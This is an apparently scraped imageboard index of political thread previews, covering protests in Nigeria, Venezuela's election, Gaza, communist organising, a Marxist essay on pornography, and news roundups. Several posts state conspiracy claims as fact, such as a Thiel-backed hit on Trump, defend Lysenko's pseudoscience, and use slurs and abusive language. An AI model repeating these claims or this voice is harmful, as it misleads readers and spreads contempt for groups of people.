I’ve already made a few posts on this topic. However, Nigeria is special, because it’s going to experience the most violent and widely documented protest in modern African history in like four days from when I post this thread. This thread is a general discussion thread on this revolution, its implications for Africa-and by extent the rest of the planet-and the total death of imperialism. Something like this isn’t something to be ignored. A protest this large on a topic this broad has the potential to fuel a socialist revolution in the country within this decade.

Feel free to commentate.
R: 17 / I: 2 (sage)

Elon Musk wants to fight Maduro

Elon Musk, owner of Xeeter and failed car company Tesla, who never once talked about Maduro prior to this past week, is now engaged in psyops to get him ousted from Venezuela so Big Oil can completely consolidate power. Maduro wants to fight Musk and Musk agrees.

R: 20 / I: 3

News 7/31/24

Hamas political chief Ismail Haniyeh assassinated in Iran
Hamas’s political chief Ismail Haniyeh has been assassinated in Iran’s capital, Tehran, according to a statement from the group that runs the besieged and bombarded Gaza Strip, which blamed Israel for his killing.

Iraqi Kurdistan prepares for October elections amid simmering political tensions and Turkey's military offensive
The Turkish military campaign against the Kurdistan Workers' Party (PKK) and the economic crisis, marked by delayed salaries due to budget disputes with Baghdad, are also key election topics. Both major parties are concerned about public sentiment regarding their ageing leadership and growing wealth, with a desire for younger faces in politics.

Left lawmakers in Greece label spyware probe a cover-up
Supreme Court prosecutor Georgia Adilini said that she found no evidence linking Greece’s National Intelligence Service, the police force or its anti-terrorism division to the use of Predator spyware, which opposition groups alleged was used against some government critics.

Ukraine military intelligence claims role in deadly Wagner ambush in Mali
Andrii Yusov, spokesman for Ukraine’s GUR military intelligence agency, said on Monday that “the rebels received necessary information, and not just information, which enabled a successful military operation against Russian war criminals”.

Sudan army chief Burhan survives assassination attempt that killed five people
Burhan, the head of the military and sovereign council, was visiting the Gibet army base for a military graduation ceremony. Video footage from the ceremony, seen by Middle East Eye, showed Burhan flanked by army officers, high-fiving military students who were ululating and shouting "God is great".

Demonstrators in Nigeria gather days early for anti-government protests
The protesters, many of them young people, converged in the town of Suleja, 3o miles outside the federal capital, Abuja, with placards criticising the government’s policies. Week-long nationwide protests had been due to begin on Wednesday.

Security forces detain chief of Human Rights Commission of Pakistan in crackdown on Balochistan rally
Pakistani security forces briefly detained Asad Iqbal Butt, the head of the Human Rights Commission of Pakistan (HRCP) on July 25. The human rights leader was taken from his home in Karachi and threatened against participation in a scheduled rally called to oppose the enforced disappearances and human rights violations in Balochistan.

Riots Against Indonesian Military After Killing of West Papua Residents
Riots broke out in Puncak Jaya, Central Papua, following the shooting of three residents by Indonesia’s military forces. The West Papua National Liberation Army-Free Papua Organization (TPNPB-OPM) denied the claims by the military that the three were part of their forces, while residents pushed for an investigation into the shooting.

Discount shopping giant Temu’s supply chain faces scrutiny as mainland sellers protest
Many of these merchants complained about Temu’s “opaque” system of slapping fines on sellers, while offering few channels for relief. At Temu’s discretion, the amount of fines can cost a merchant up to five times the price of a product that is subject of a complaint.

Remains of missing people found in military property in Uruguay
A few meters from where Castro was buried, on March 15, 2012, the remains of Ricardo Blanco, a member of the Revolutionary Communist Party (PCR) and the Power Plant Group and State Telephones (AUTE) and the Inter-Union Plenary in the town of Mercedes, were found.

Javier Milei’s government will monitor social media with AI to ‘predict future crimes’
After restoring the State Intelligence Secretariat and assigning it millions of reserved funds —for which he does not have to account— the president has now created a special unit that will deal with cyberpatrolling on social media and the internet, the analysis of security cameras in real time and aerial surveillance using drones, among other things.

Colombian President Petro calls on Venezuela’s Maduro to release detailed vote counts from election
“The serious doubts that have arisen around the Venezuelan electoral process can lead its people to a deep violent polarization with serious consequences of permanent division,” Petro said in a post on social media site X. “I invite the Venezuelan government to allow the elections to end in peace, allowing a transparent vote count, with the counting of votes, and with the supervision of all the political forces of its country and professional international supervision,” he added.
R: 57 / I: 10

Revolutionary Communists of America

"The RCA is a party of class fighters committed to the complete overthrow of capitalism. We fight for a world of material superabundance and reject the artificial scarcity of a system based on the pursuit of profits.

We fight to build a revolutionary leadership worthy of the name and to establish a workers’ government that can mobilize the working class to tackle the capitalist roots of war, inequality, oppression, and climate catastrophe.

As part of the struggle for the American Socialist Revolution, we fight for concrete improvements in workers’ lives and offer a vision for how society could be reorganized once the working class wins political and economic power.

We are proud members of the Revolutionary Communist International, which shares the same aims and is active in dozens of countries worldwide."

Does anybpdy know about this group? Or have any experience with them.
I searched about the Revolutionary Communist International and they seem to have a bunch of parties around the world, parties which for most, I have never heard of them.
So far, thet seem to follow trotskist ideas, but their party program seems interesting enough.

Also, a bit offtopic, but it's always so stupid to have a bunch of communist parties with like 5 members each and small ideological differences over some meaningless stuff sometimes. Do you think they could be a way to from an united party sort of thing, or united front of communists? At least to me, that would be the best way of at least creating a strong mass movement, problem it's always how can we reconcile some ideological differences like the ones between Marxists-Leninist and Trotskyst, that although they are important, over all both follow a similar way of organizing and theory derived from Marx and Lenin.
Same with Maoists, they are really similar to other communist, but it seems like we just focus on the differences.
Would there be a way to reconcile these groups and form a sort of United Party?
R: 12 / I: 1

São Paulo Forum

Does /leftypol/ even know about the biggest left-wing conference from the west, where a bunch of lefty leaders from all around South America get together to brainstorm their ideas?
It's been a thing that a lot of people don't even know about for some reason.
A woman called Graça Salgueiro dedicated her life to studying, researching and writing everything he knew in her book "O Foro de São Paulo: A Mais Perigosa Organização Revolucionária das Américas". The poor woman is so enigmatic, she doesn't even have her own wikipedia article, neither does her book.

São Paulo Forum does though:

Anyway, what do you guys think?
R: 14 / I: 1
Reminder that the assassin of JFK's younger brother, Sirhan Sirhan, an anti-Zionist Palestinian communist, is still alive and is currently 80 years old.

Sirhan decided to assassinate Robert F. Kennedy Sr. (Democratic candidate in the 1968 presidential elections) for his support of Israel.
R: 18 / I: 0

Cuban gusanos are by far some of the most ungrateful people on earth

How ignorant are these fuckers to the realities of capitalism internationally? Do these retards think that being capitalized somehow fixes every problem they have under socialism? It doesn’t. In Cuba, you’re guaranteed a wage that you get paid for for all of your work, but in capishit earth you aren’t even guaranteed to even get paid in the most developed countries even if you’re not enslaved—and if you complain about it, suddenly it’s “your choice to leave” to someone else that’ll do the same. Cuban government officials never had to introduce austerity, draconianism, and debt to save their system everytime it ballooned and fucking imploded—much less consistently every few years to months. They didn’t have to make shit up about how good their country was to the fucking planet, because their life expectancy and standard of living told the world itself about how much better off they were compared to everyone else. They’re not stuck with a god forbidden colourist caste system like in fucking India or Brazil. They’re aren’t stuck dealing with an artificially created drug and cartel war and get to live in fucking peace and safety. I could go on and on. It’s so fucking unfair to watch those guys only progress further and further while everyone else in this planet can suck a fat one for nothing.

To the guys holding massive protests in Africa, please work with the socialist parties there and liberate yourselves from this capitalist mess of a planet. It just helps to have one less imperialist-resource-dependent war zone that one has the option to live in on this earth.
R: 16 / I: 4

communsio di italia

which one of you was this? I was enjoying a nice weekend away from hell (work) and I get this put into my face. You have a lot of guts doing this in front of a church too, don't you think the average italian is too religious for secular communism
R: 2 / I: 0
What's with people positing that 'Western morals' (?) are socially constructed rather than eternal but then implying that other supposed 'value systems' (?) somehow aren't just for being outside this alleged 'hegemony'.

Ignoring of course that it's pretty much impossible to determine what constitutes 'Western morals' anyway. People talk about gender and sexual norms a lot, but being gay was illegal in England till 1967 and didn't become fully legalised in the USA till 2003, ie, rather recently. French women couldn't open independent bank accounts before 1965. Switzerland didn't allow women to vote in federal elections till 1971 and the last individual canton allowed it only in 1990. So what exactly constitutes an unchanging, historically static 'Western morality'?

At any rate it's retarded for self-styled communists to be wanking over morals and cultures like this. Communism means the obliteration of all existing cultural traditions and norms without exception - your stupid petty culture, East or West, isn't making it past class society.
R: 17 / I: 2
Hope you have some good popcorn ready. Anyway, I have the NED files uploaded in this post just in case the NED takes the article down.
>The Grayzone caused ‘biggest PR fiasco in history’ for US govt regime change arm, leaked emails reveal
>The Grayzone’s publication of an embarrassing phone call with a National Endowment for Democracy VP triggered an institution-wide meltdown at the US government’s regime change laboratory. Following the call, the group’s founding president privately admitted the “fiasco” exposed major “problems beneath the polished surface.”
>Now, leaked emails obtained by The Grayzone reveal the organization has since descended into chaos, with two senior officials fired due to the fiasco, and remaining staff engaged in civil war between the neocon old guard and the “woke” new generation hired to replace th
>– Senior NED management is currently in complete disarray, with two high-ranking staffers fired due to their handling of The Grayzone’s phone call, and founding president Carl Gershman isolated and marginalized by those who took his place.
>– What began as a bitter dispute over the decision to engage with The Grayzone ultimately devolved into a full-fledged culture war that pitted the group’s neoconservative founders against its more liberal recent hires, derided by the neocon old guard as “woke flakes” obsessed with “microaggressions” and compulsory DEI trainings.
>– One of the fired NED staffers, neocon Michael Allen, accused his progressive boss of a “clear campaign of harassment, marginalization and victimization,” and fretted over her allowing NED staff to attend pro-Palestine rallies. He was so incensed by his dismissal that he threatened to reveal the details of his firing to the “many mailing lists of key decision-makers and opinion-formers that I have built and retained over the years” if he did not receive a substantial settlement.
R: 573 / I: 61

the pornography question

"The Pornography Question"

I've been doing off and on research into what I call "The Pornography Question". Let's define pornography as explicit material, sexual in nature, created by one or more consented adults, for the consumption by adults. Basically, is it compatible with communism? Is it inherently anti-women? Is it inherently unethical? A sign of capitalist decay?

Prior to this I had a fairly negative outlook on the medium as a whole, mostly stereotypes. Mostly insofar as, assuming the overwhelming majority of women are not willingly be in the industry, either they've been coherced, trafficked or had to for the money, and thus, consuming the material is inherently harmful to women. But at the same time, I've dated a couple of Sex Workers, I've dated a dancer/softcore model and an onlyfans creator. The onlyfans creator said it was a way to empower herself, she said it was far less degrading that working as a waitress, I believe it. I never cared in either case, it's a job, get the bag, it ain't tricking if you've got it. Of course both of these relationships were before I was really a commie, so I lacked the more systemic understanding of how neoliberalism works to commodify the personal. And, admittingly, the stereotypes still played a role in the acceptance of my ex's work, ie "Something must have happened in her past to cause her to do this but I don't care that she does it".

A former friend, whom is a 36 year old former model (remember Suicidegirls?), lamented about not being able to model anymore because she was worried about the *stigma* and how it might reflect on her as a professional, career wise. She was very proud of her past career. In fact, her upbringing was very strict, with Christian gender roles and a traditionalist worldview. The same type of culture that created incredibly creepy events like Purity Balls, the same culture that normalizes treating women as objects to be traded between men. That sort of southern Christian culture that I've long rallied against. It's these personal contradictions that prompted further critical introspection into the medium as well as my own ingrained opinions on it.

Almost every study I read completely ignored or outright handwaved gay and queer porn, and this to me presents an issue. How can you handwave a significant part of a medium and then say the entire medium is bad? If someone made the argument that horror movies are degenerate bourgeoisie decadence, but only used films like Saw and Hostel as examples, that would be pretty disingenuous no? So I started reading interviews with queer people who work in the industry. 1/2 Very common sentiment was that this medium provided a space for them to express their queerness in ways they might otherwise not be able to. So, many of the earlier, more anti-pornography SWERFs and studies straight up ignored queer people, and when we do see the perspective, it's basically the opposite of the assumed one.

One issue I had with Dworkin's arguments is that she lacks a material basis for her claims, while also using a fairly narrow definition of pornography that's not really accepted by the mainstream society has a whole. She defines pornography as a medium that is inherently showcasing acts of violence against women, and then uses this definition to showcase how porn contributes to the mass normalization of a patriarchal society. Which is to say, she draws a distinction between pornography and erotica in such a way, that few others who aren't also SWERFs do. By their own definition many Onlyfans creators would not be creating pornography but erotica, because their definition of pornography requires some act to be done to a woman (rarely if ever does she mention queer people). Dworkin and her contemporaries, such as MacKinnon, distinguished between pornography and erotica based on the presence of violence and degradation. Erotica, in their view, is consensual and non-degrading sexual expression, whereas pornography inherently involves the subjugation and objectification of women. However, the overwhelming majority of people do not make this narrow distinction. This, fundamentally, is leads to issues because we're working with two definitions here.

The crux of Dworkin's argument is that pornography is a manifestation of the misogyny embedded in patriarchal society, how can this be true, if those same patriarchal forces are directly responsible for the repression and censorship of pornographic materials? Further, how can this be true if, as mentioned later we look at pre-Christian societies, and how sex was depicted in a much more open sense in a variety of cases? Further, how does this account for gay porn? Trans porn? Queer porn? Consider a typical pornographic scenerio, a slender woman is rough, passionate sex with two large, fit men. Their faces are obscured, and she's centered in the film's composition. This is, by Dworkin's definition absolutely pornography, and thus a manifestation of our patriarchal society. Now, consider the same scenario without a woman involved. A slender twink is having rough sex by two fit men. Does this evoke the same reaction inherent "wrongness" in relation to a patriarchial society, or does it evoke the inherentness of male sexuality, something we've been trained culturally to accept? Is it that our culture continues to subliminally and consciously acknowledge female sexuality as inherently innate?

You know, I've been told that you can't be pro-communist and be, you know, pro-pornography, because it's inherently anti-women, right? To be honest, the idea that there's no way a woman could want to have or participate in such activities, but if it's a man or a queer person, or gay porn or whatever, then it's different, that to me seems like inherently misogystic contradition to posit. Especially when we consider the root of this obsession with controlling the sexuality of people, namely working class people, is rooted in 17th-18th century English aristocracy. In fact, the first law that criminalized pornography was the English Obscene Publications Act 1857, and to this day, any depiction of female ejaculation in pornography is completely banned in the UK.

Soon after, similar laws spread across much of the other imperial nations of the time, America's 1865 Comstock Act (which also sought to control abortion and contraceptives), as well as Tsarist Russia, with the anti-pornography laws on the books in the USSR being inhereted from this era. We can look at former Eastern block states like East Germany and Yugoslavia for much more lax laws on the material as well. Going further back now. We can see in various pre-AD societies, that sexual expression was much different than it is in our current, western culture. From trans priestesses in Sumeria, to ancient Nubian and Cretan matriarchial societies, as well as the Japanese tradition of Shuga, among countless other examples, it's clear our society's sexual culture is not innate to the human experience itself. A historical material analysis shows us this.

We see that the rise of industrialization, and indeed the earliest stages of capitalism saw the rise of these anti-pornography censorship laws. In some places, even the mere act of masturbation was deemed obscene, causing mental illness. As the working class formed during this urbanization, industrialization period, these laws and cultural stances served as a means of controlling the working class further. Workers lived closely, often in flop houses and other packed, cramped buildings. Company towns were not uncommon. Your boss is your neighbor, and your boss is the mayor, and these additional layers of control served as a means to both pacify and create a culture of shame around the sexual nature humans inately have, these layers of control are a central means in which the capitalist class normalizes and diffuses a layer of anxiety that allows for the boss, the manager, the overseer, to enact further control over the working classes.

How can the argument that pornography, as a medium, is inherently a manifestation of the patriachy, if the root cause of the patriarchy, according to a Marxist feminist view, is capitalism, and we know that, during the rise of capitalism and industrialization, the culture of sexual shame and censorship was made manifest via various laws in-acted by the capitalist class to control the proletariat? Further, how can one reduce the medium to it's most obscene interactions, and then judge it on those merits alone? And finally, if those obscene interactions are done consentually, then is to judge them as inherently patriachial not, ironically, re-inforcing the patriarchal denial of women as innately sexual beings, while re-inforcing the ideal that men, innately are? We would not scoff at a man who responds to "Why did you become a porn star?" with "Because I like sex." but, the same response from a woman in our current societal framework would, for most, evoke a different reaction.

There are issues, but these issues are worker's issues. Safety, consent, trafficking, sexual harassment. Many of these issues are bought up as a way to paint pornography as inherently maleficant but, other industries are plagued with them as well. Trafficking for example, is very common for hotel house keeping services, typically women as well. Sexual harrassment from customers and co-workers plagues various industries, including tech, think about the treatment of women at game companies like Blizzard for example.

My ex, as mentioned above, was pretty open that she liked to get off, and that she felt more degraded as a waitress than selling videos online. When one asks female performers, aside from workers issues stated above, they mention the stigma. The lack of career options after they exit the industry, the social stigma, the scarlet letter that performing in porn brings upon them. Does this not reflect the same psychological control mechanisms mentioned above? If pornography is, as some of my contemporaries have put, "the peak of neoliberalism", why then, do major payment systems like Visa, Mastercard, Cashapp, Paypal, etc shutdown sex work and pornographic content creators so often?

It's for these reasons that I have to conclude that pornography, as defined in the introduction, is not inherently anti-woman, nor is it inherently bad. Like video games, or film, or music, pornography is a medium of expression, in it's case, sexual expression. Could it be that it's the very deeply ingrained sexual culture created over the last 200 years of industrialization that's the issue? Someone spends an hour playing a highly realistic simulation of war, these games are highly popular, played primarily by young men and the development of these games are often funded, in part, by the US Department of Defense. We don't have any level of shame built around these simulations of violence, yet, they often lead enlistments, to real death, real trauma. One must ask, why is sexuality shamed and admonished, but violence celebrated?
R: 11 / I: 0

Holy fuck, it’s like none of these dipshit leaders re learning anything

Bangladesh, Nigeria, Kenya, Uganda, and now Ghana, why the fuck are any of these autocratic rats so hellbent on continuing their corrupt regimes indefinitely when there’s a shitload of evidence at this point that attacking protesters for demanding better governance is a sure-fire way to get people storming parliament buildings and attacking politicians in swarms. Why not just apologize, do something, and move on? I get that these leaders are capitalistic stooges living off taxpayer money, but cmon, personally I would’ve just fucking left instead of putting up with dickheads with blunts and bombs waiting at my doorstep over a policy I can end in minutes.

Oh well, here’s the next major anti corruption protest if anyone cares.
R: 6 / I: 2

Pour one out

Ismail Haniyeh has been assassinated by zionist dogs in Tehran. May the bastards who executed this cowardly act suffer for their crimes one day.

R: 134 / I: 72

/webm/ Thread 6

1st thread: >>>/leftypol_archive/9920
2nd thread: >>>/leftypol_archive/481354
3rd thread: >>>/leftypol_archive/492596
4th thread: >>>/leftypol_archive/561028
5th thread: >>>/leftypol_archive/588525

WebM for Retards™ (Webm Converter): https://github.com/WebMBro/WebMConverter
R: 25 / I: 5


Max Azzarello set himself on fire three months ago in front of the Trump trial to draw attention to the global burgeoning Ponzi scheme and its links to neoreactionary billionaire Peter Thiel. Now that the Thiel network possibly attempted a (failed) hit on Donald Trump to install their man J.D. Vance as the next President, are you still laughing? The plan was/is to radically devalue US dollars to collapse the entire world economy and then replace the reserve currency *with cryptocurrencies*, creating massive profits for Thiel and his networks.
And yes, the part about The Simpsons WAS also true, no it's not a meme. The billionaires use their ownership of media conglomerates and monopoly over advertising to insert demoralizing and divisive messages everywhere so people won't unite and fight back.
Azzarello held a sign reading: "Trump is with Biden and they're about to fascist coup us". Now do you see the theater?
R: 1 / I: 0

Front de libération du Québec

From Burgerland. I'm curious, Canadacucks, whats ur opinion on the FLQ? What do you guys know about them?
R: 129 / I: 16
Why does the American right-wing hate academia and the medical establishment so much?

When I look through propaganda made by American conservatives, I notice they spend an ungodly amount of time attacking universities and doctors. Anti-vaxx garbage is almost entirely coming from right-wingers. Hatred of doctors and modern medicine shows up in mainstream conservative media. Likewise, ten years ago the American right was still going on and on about the "Cultural Marxism" conspiracy theory and how the Frankfurt School secretly hatched a plot to turn universities into Marxist indoctrination centers. In the early 2010s multiple documentaries were posted to YouTube which furthered this narrative (one of them was called "Agenda: Grinding America Down" and the other was called "Cultural Marxism: the Corruption of America"). Neocons like David Horowitz were also big in pushing this conspiracy.

Or, we can look at the anti-abortion movement. Anyone who knows anything about the American anti-abortion movement will know they were basically the GOP's Brownshirts during the late 80s all throughout the 90s (look up Operation Rescue and the violence they committed against abortion clinics). The anti-abortion movement's two biggest targets are always the medical field (for the obvious reasons) and academia (they claim higher education is part of an "abortion web" or some shit), not politicians or capitalists.

My question is, why? There are even right-wingers out there who will claim college professors and doctors are the "real" people running America. Why do right-wingers see academia and the medical field as "threats" to their ideology and way of life (or, better yet, class interests)?
R: 74 / I: 13

Christians themselves are responsible for their own issues with atheism

The level of corruption and stupidity present in Christian communities in the past and present is astounding. 90% of all church lessons default into arguments over sexual immorality and “pray to Jesus”, because the leaders in most churches internationally don’t have a fucking clue about the religion’s history, philosophies, ideologies, or even applications in the present day. If they did hold discussions about topics that advanced, there wouldn’t be so many people leaving religion in general in fucking droves—much less so many denominations. Stack that shit on top of constant infighting between scholars and leaders, mass embezzlement of funds, and church leaders asking for increasingly delusional sums of money from their members and you got a recipe for a religion that’s set to become obsolete this century.
The fanatics want people to take their fucking religion seriously so much, yet they conveniently don’t have the energy to hold their own members accountable for that responsibility at all 🙄.
R: 610 / I: 81 (full)
Hello Anons, I ask you as a Venezuelan what is your opinion of the elections that are taking place in Venezuela.

I'm interested in hearing what you think.
R: 631 / I: 298 (full)

Palestine vs The Zionist Entity #90 - Lazy Motherfuckers On Leftypol Didnt Make A New Thread Edition


🚨 Live Happenings/Updates 🚨

Al-Jazeera: https://www.aljazeera.com/news/liveblog/2024/7/13/israel-war-on-gaza-live-dozens-of-bodies-recovered-after-massacre

Middle East Eye: https://www.middleeasteye.net/israel-palestine-hamas-war-gaza-live-invasion

The Guardian: https://www.theguardian.com/world/palestinian-territories

Times of Israel: https://www.timesofisrael.com/topic/liveblog/ (trigger warning)


Our own wiki. Be sure to add to it and create branching articles:



From the UK, single issue long time Palestinian investigative and general reporting, critical source

From the USA

Regional news from an anti-imperialist perspective

Premier Human Rights org

Left news and opinion webzine from Tel-Aviv

A collection of resources for organizers and anyone who wants to learn more about Palestine

Known anti-zionist academic Norman Finkelstein's blog



al-Qassam Brigades









(This includes blatantly obvious concern failtrolling/fedposting, painfully unfunny/nuclear misanthropic autism [ie. /pol/] and derailing/hyper sectarian schizophrenia)

Always remember to double-check your sources, as well as provide access to it.

الله أكبر
.الى جميع الكادحين في الشرق، ان مصيركم في ايديكم
!يا عمال العالم ويا شعوبه المضطهدة، اتحدوا
R: 173 / I: 26
This is NOT a drill.

Chomsky appears to be on death's door. He's 95 and just had a stroke.

At the very least, give him your prayers, say psalms for a full and speedy recovery (he's Jewish so it makes sense to do the Jewish tradition), give him your positive energy, and all that.

Use this thread to keep everyone updated.

I can't believe he may finally go. I truly believed he would live to be 100 or never die.
R: 65 / I: 9

Israel Coup?

>Chaos erupted at the Beit Lid base in central Israel last evening as hundreds of Israeli demonstrators stormed the military court to protest the arrest of soldiers accused of sexually assaulting a Gaza prisoner.
>The court’s verdict remains undisclosed, with army forces surrounding the area amid extreme tension, according to Al-Jazeera.
>The Israeli military police intervened after a military spokesperson announced an investigation into serious prisoner abuse allegations. Nine out of ten soldiers suspected of sexually abusing a Palestinian detainee were arrested by the military police.
>Clashes ensued between military police officers and reserve unit forces suspected of torturing prisoners, as the latter tried to prevent the soldiers’ detention for investigation.
>The Israeli newspaper Haaretz reported that the army is conducting criminal investigations in 48 cases of Palestinian deaths, most of whom were prisoners from Gaza, with 36 deaths occurring in the Sde Teiman camp.
>In response to these developments, the Israeli army has summoned soldiers preparing for combat in Gaza, forces from the West Bank, and soldiers on leave to deploy near the Beit Lid camp.
So Israelis are rising up against their fascist government because it isn't letting them rape Palestinians.
R: 50 / I: 8

boomers and israel

Why the fuck are boomers so pro israel?

<Zionism’s hegemony in American public life is an integral part of the world crafted by the baby boomer generation in its heyday, from the 1970s onward. Obvious examples of boomer Zionists include dispensers of conventional wisdom like New York Times columnist Thomas L. Friedman and Harvard psychology professor Steven Pinker. But just as many Jews of this generation are not Zionist, many of the most important boomer Zionists are not Jews. Joe Biden, though born in 1942 and a Catholic, is an exemplary boomer Zionist, proudly making self-damning statements like “I’m a Zionist. Where there’s no Israel, there’s not a Jew in the world [that is] safe.” So is Henry Louis Gates Jr., who has waxed eloquent about first visiting Israel at age 19 (“a treasure of civilization for the entire human community, but a most vulnerable one,” he said in blurbing Alan Dershowitz’s The Case for Israel). In pretty much any domain, boomer Zionists are amply represented among the gatekeepers.

<Anyone who moves through elite institutions implicitly understands the parameters set by boomer Zionists. One learns to follow the lead of friends, colleagues, and kin who reflexively give Israel the benefit of the doubt, fostering a culture of deference — what Umayyah Cable has called “compulsory Zionism” — reinforced by the punishment of dissenting voices. As a result, it is very common for even those with no emotional attachment to Israel to nonetheless practice a willful ignorance stemming from empty mantras about Israel’s “right” to self-defense or about “Middle East politics” being a faraway, messy, “just don’t go there” issue.

<Boomer Zionism was made possible by the geopolitics of U.S. imperialism. Israel’s military victory in the 1967 war, which completed the conquest of Palestine and resulted in the capture of Syrian and Egyptian territories as well, confirmed its status as a regional power. By dealing a crippling blow to the cause of pan-Arabism, Israel proved its strategic value to the United States and cemented the close alliance that persists to this day.

<But the geopolitics alone cannot account for the seemingly bottomless depth of support in terms of dollars, UN vetoes, and affective identification among elites. In contrast, U.S. support for Saudi Arabia is arguably just as reactionary and durable, but it can be publicly criticized with far less consequence. Any materialist analysis must also reckon with Zionism’s small but significant social base inside the United States, which cuts across conventional partisan divides and unites constituencies beyond the national security bureaucracy and arms companies that typically shape U.S. foreign policy. The Zionist coalition is heterogenous. On the right, Christian evangelicals have become a major source of support for Israel. More relevant for any left analysis, however, is the other significant part of Zionism’s social base: the professional classes, where many American Jews of European origin happen to be located.

<The close alliance between the two states allowed mainstream Jewish organizations in the United States to decisively embrace Israel, ending decades of ambivalence partly rooted in fear of stoking antisemitic perceptions of “dual loyalty.” As Hannah Arendt foresaw in her 1945 critical reassessment of Zionism, anxieties over accusations of dual loyalty gave way to dual privilege: American Jews, entering the middle class in ever greater numbers, could be avidly Zionist and exemplary U.S. citizens at the same time. Publicly questioning the role of Zionism in the U.S.-Israel relationship on nearly any grounds came to be cast as a form of antisemitism in itself. What Arendt did not clearly understand — and what her uncritical celebration of settler notions of freedom blinded her to — was that Zionism facilitated assimilation not only into American society but into American whiteness in particular.

<Israel’s existence furnished an “old country” that Jews of European origin could refer back to as a point of origin and cultural connection within the category of the West, in the way that white ethnics could relate to Italy, Greece, Poland, and so on. Yet unlike these European homelands, Israel was also, in the words of Theodor Herzl, the founder of modern Zionism, an “old-new land”: a settler colony with an active frontier. Colonizing newly seized territories while suppressing a restive indigenous population made Israel a source of identification and vicarious enjoyment not only for assimilating American Jews but for white Americans in general.

R: 8 / I: 0


Is it worth reading liberal anti communists like Anne Applebaum or Andrea Chalupa?

That last person who wrote this movie: https://en.wikipedia.org/wiki/Mr._Jones_(2019_film)
R: 330 / I: 92

/Occult/ - Study General

👁️🪬🧿Secret Societies & Cryptocracy Study 🏛️🤝🐲

Being well aware that capitalism is the root of all problems and not some Catholic / Zionist Masonic Lodge or a Council of 13 I want to dedicate a thread towards the study of what these organizations actually are, how they accumulated their wealth from their foundation, what their influence is and what their goals are.

This is not a Poltard thread about "da jooz"! This is a thread dedicated towards the study of said esoteric societies / "magical" organizations and their spheres of influence.

From the illumnati, to the anarchist The Black Hand, to the obscure Neo-Nazi pedo cults given by the Order of Nine Angels & Temple Ov Blood, to the Mormons, to the pyramid scheme of the Church of Scientology, LaRouche and so on! How they infiltrate government positions, political parties and what we know about them.

Recommended books for analysis (links not included, might post PDFs in the thread):
-Occult Features of Anarchism by Christopher Scott Thompson and the Erica Lagalisse
-Bakunin's Anti-Jacobinism: 'Secret. Societies' For Self-Emancipating. Collectivist Social Revolution by Robert M. Cutler
-Revolutionary Demonology by Gruppo Di Nun
-Any book on the illumnati (c'mon they're in your supermarket's books aisle! Lets have a laugh)
-Magick by Aleister Crowley
-The Golden Dawn: The Original Account of the Teachings, Rites & Ceremonies of the Hermetic Order by Eminem aka Marshall Bruce Mathers II 's Ancestors (just kidding, Israel Regardie and John Michael Greer)
-Liber Null & Psychonaut: The Practice of Chaos Magic by Peter J. Carroll and Ronald Hutton
-The Chaos Protocols: Magical Techniques for Navigating the New Economic Reality by Gordon White
-Don't touch this book by Jan Udo Holey (Jan van Helsing) ((Funny rightoid schizo))

Lets turn on the vacuum cleaner to start hunting spooks and demystifying them!
R: 452 / I: 79
Lysenko chads stay winning. Turns out, nest sowing works, and Mendelians were proven to be clowns fighting against scientific progress out of ideological, not scientific, reasons once again

About Lysenko's nest method https://www.cabidigitallibrary.org/doi/full/10.5555/19500602955

>N. P. Anuchin. Letter to the Secretary of the Central Committee of the CPSU V. Polyakov[113].

>Acad. Sukachev, V. Ya. Koldanov and with them a significant group of specialists for 15 years wove intrigues and slander around the name of Lysenko in connection with the nesting method of creating a forest. Academician Lysenko was accused of allegedly bringing billions of dollars in losses to the country by the nest method.

>In 1962, on the instructions of the government, special zonal commissions examined protective forest plantations created by nesting and other methods. Up to 250 specialists participated in the commissions, and opponents of the nesting method of forest sowing were also involved in the work of the commission. Summarizing all the materials of the commission was entrusted to me, and I also acted as the main speaker at the All-Union meeting, which considered the results of the survey of protective plantings. At this meeting, as well as at the general meeting of the USSR Academy of Sciences, there were attacks, slanderous attacks and insults against Academician Lysenko. However, the advantages of the nest method based on the materials of the commission turned out to be so obvious that no tricks of the opponents of this method could change the point of view of the meeting.

APOLOGIZE to the greatest Soviet agrobiologist
R: 42 / I: 6


How do we support those moving away from fascism and other totalitarian movements?


- https://lifeaftehate.org
- https://evolveprogram.ca
R: 2 / I: 0







R: 499 / I: 87

French & UK Election Lemmings /FUEL/

A thread dedicated to the elections of:
>France: June 30th
>UK: July 4th
>France (round two): July 7th

Big habbenings in the 2 main powerhouses in Yurop (besides Worst Germoney).

Really good rundown on tomorrow's election in Frogland by our comrade Michael Roberts: https://thenextrecession.wordpress.com/2024/06/29/france-macrons-gamble/

Mind you, the Frogs are about to host an Olympics very soon and are having shittons of problems regarding the water quality of the river supposed to host some water sports and terrorism threats, and now they nuke it with a surprise election to top it all.

In any case, comrade roberts will surely have something to say about britbong electioms as well, so keep looking up his blog in the following days.

…on another note…

Just how communist is Melenchon and his alliance? Will the libs (Macron &co.) pull another "anti-fascist" cry against Le Pen, even if it means encouraging socdems/commies/greens?

"/Fuel/" comes from basically the idea that Europe is down the shitter and these are just fuel to the fire the continent is on (burger dominance, ukro cuckoldery, recession, inflation), and the Lemming part is due to all of us going down the drain in unison, like good lemmings do.
R: 622 / I: 106 (full)

I am being sued by the American Communist Party

What can I do but respond

Are you aware of these guys lol

I have a response I wrote them and sent them in reply via the same delivery method (unsolicited DM)
R: 30 / I: 8 (sage)

Thinking objectively

Is there anything that /pol/tards have said that /leftypol/ users could also agree on, even if not entirely?
The whole situation involving Israel, Mossad, Hollywood and Jeffrey Epstein for example, were they right about this shit? Both /pol/tards and /leftypol/tards seem to hate it for different reasons, but that ultimately lead to the same thing…
Sometimes i think that rightoids and leftists are fighting the same enemy, but they just call it by a different name, kind of like every religion has a different interpretation for the creation of the world.
R: 5 / I: 2

News 7/29/24

Israeli soldiers suspected of raping Palestinian prisoner arrested, sparking far-right riot
Israeli military police raided Sde Teiman but were met with resistance by soldiers, who reportedly barricaded themselved into the facility and used pepper spray to defend themselves before eventually being taken into custody. The soldiers were suspected of abusing a Palestinian detainee, who according to Arab48 is suffering from "a serious wound in his rectum area".

'Get out war criminal!': Netanyahu confronted by angry Majdal Shams crowd in visit to deadly strike site
Locals could be heard chanting "Killer! Killer!", "Get out, war criminal" and "You’re not welcome here!" as the premier, accompanied by the head of Israeli intelligence service Shin Bet, arrived at the site of Saturday’s massacre. "Oh you Zionist, get out of the free Arab land", others said.

IRGC extends military exercise in Kermanshah’s protected areas
